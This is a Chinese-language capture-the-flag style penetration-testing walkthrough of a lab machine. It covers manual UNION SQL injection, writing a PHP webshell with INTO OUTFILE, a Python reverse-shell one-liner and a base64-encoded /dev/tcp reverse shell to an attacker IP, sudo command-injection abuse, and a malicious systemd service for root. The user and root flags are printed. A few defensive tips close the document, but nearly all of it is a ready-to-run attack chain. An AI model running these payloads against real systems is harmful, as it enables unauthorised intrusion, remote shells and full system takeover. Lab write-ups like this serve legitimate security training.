Meachines渗透测试实战教学文档<\/h1>

信息收集阶段<\/h2>

目标识别<\/h3>

IP地址<\/strong>: 10.10.10.143<\/li>

开放端口<\/strong>:

22\/tcp (SSH - OpenSSH 7.4p1 Debian)<\/li>
80\/tcp (HTTP - Apache 2.4.25)<\/li>
64999\/tcp (HTTP - Apache 2.4.25)<\/li> <\/ul> <\/li> <\/ul>
扫描技术<\/h3>
使用Nmap进行快速扫描:<\/p>
nmap -p- 10.10.10.143 --min-rate 1000<\/span> -sC -sV <\/span><\/span><\/code><\/pre>Web应用渗透<\/h2> SQL注入攻击<\/h3> 手工SQL注入检测<\/strong>:<\/p> 确定字段数量:<\/li> <\/ul> curl -s 'http:\/\/10.10.10.143\/room.php?cod=1 order by 7--+'<\/span> | wc -c <\/span><\/span><\/code><\/pre> 确认可注入点:<\/li> <\/ul> http:\/\/10.10.10.143\/room.php?cod=-1 union select 1,2,3,4,5,6,7--+ <\/code><\/pre> <\/li> 数据提取<\/strong>:<\/p> 获取表名:<\/li> <\/ul> http:\/\/10.10.10.143\/room.php?cod=-1 union select 1,GROUP_CONCAT(DISTINCT table_name),3,4,5,6,7 FROM information_schema.columns--+ <\/code><\/pre> 读取系统文件:<\/li> <\/ul> http:\/\/10.10.10.143\/room.php?cod=-1 union select 1,LOAD_FILE('\/etc\/passwd'),3,4,5,6,7--+ <\/code><\/pre> <\/li> 文件写入<\/strong>:<\/p> 写入PHP webshell:<\/li> <\/ul> http:\/\/10.10.10.143\/room.php?cod=-1 union select 1,'<?php system($_GET[1]);phpinfo();?>',3,4,5,6,7 INTO OUTFILE '\/var\/www\/html\/reverse.php'--+ <\/code><\/pre> <\/li> <\/ol> 获取反向Shell<\/h3> 使用Python反向Shell:<\/p> curl 'http:\/\/10.10.10.143\/reverse.php?1=python3+-c+%27import+socket%2csubprocess%2cos%3bs%3dsocket.socket(socket.AF_INET%2csocket.SOCK_STREAM)%3bs.connect((%2210.10.16.24%22%2c10034))%3bos.dup2(s.fileno()%2c0)%3b+os.dup2(s.fileno()%2c1)%3bos.dup2(s.fileno()%2c2)%3bimport+pty%3b+pty.spawn(%22%2fbin%2fbash%22)%27'<\/span> <\/span><\/span><\/code><\/pre>权限提升<\/h2> 横向移动<\/h3> 检查sudo权限<\/strong>:<\/p> sudo -l <\/span><\/span><\/code><\/pre>发现可以以pepper用户身份执行\/var\/www\/Admin-Utilities\/simpler.py<\/p> <\/li> 利用simpler.py执行命令<\/strong>:<\/p> 读取文件:<\/li> <\/ul> echo '$(cat \/etc\/passwd)'<\/span> |sudo -u pepper \/var\/www\/Admin-Utilities\/simpler.py -p <\/span><\/span><\/code><\/pre> 执行反向Shell脚本:<\/li> <\/ul> echo 'L2Jpbi9iYXNoIC1jICIvYmluL2Jhc2ggLWkgPiYvZGV2L3RjcC8xMC4xMC4xNi4yNC8xMDAzNSAwPiYxIgo='<\/span>|base64 -d >\/tmp\/rev.sh;chmod +x \/tmp\/rev.sh <\/span><\/span>echo '$(\/tmp\/rev.sh)'<\/span> |sudo -u pepper \/var\/www\/Admin-Utilities\/simpler.py -p <\/span><\/span><\/code><\/pre><\/li> <\/ol> 获取用户标志<\/h3> User.txt: 2354b15a6cb7ae36bfd2cb72f7b69b0d <\/code><\/pre> 最终权限提升<\/h3> 使用systemctl提权<\/strong>:<\/p> 创建恶意service文件(\/tmp\/pwn.service):<\/li> <\/ul> [Service] Type=oneshot ExecStart=\/bin\/bash -c '\/bin\/bash -i >&\/dev\/tcp\/{re_ip}\/{re_port} 0>&1' [Install] WantedBy=multi-user.target <\/code><\/pre> 链接并启动服务:<\/li> <\/ul> systemctl link \/tmp\/pwn.service <\/span><\/span>systemctl start pwn.service <\/span><\/span><\/code><\/pre><\/li> 获取root标志<\/strong>:<\/p> <\/li> <\/ol> Root.txt: 9d8eb89d70c481256f008375359affec <\/code><\/pre> 关键点总结<\/h2> 手工SQL注入<\/strong>:<\/p> 避免使用sqlmap等自动化工具(会被封IP)<\/li> 使用UNION SELECT确定字段数量<\/li> 利用LOAD_FILE和INTO OUTFILE进行文件读写<\/li> <\/ul> <\/li> 命令执行绕过<\/strong>:<\/p> 使用base64编码绕过过滤<\/li> 通过sudo权限执行任意命令<\/li> <\/ul> <\/li> 权限提升技巧<\/strong>:<\/p> 利用systemctl创建恶意服务<\/li> 通过服务执行获取root shell<\/li> <\/ul> <\/li> 防御建议<\/strong>:<\/p> 对SQL查询使用参数化查询<\/li> 限制文件系统写入权限<\/li> 严格控制sudo权限<\/li> 监控systemctl服务创建<\/li> <\/ul> <\/li> <\/ol>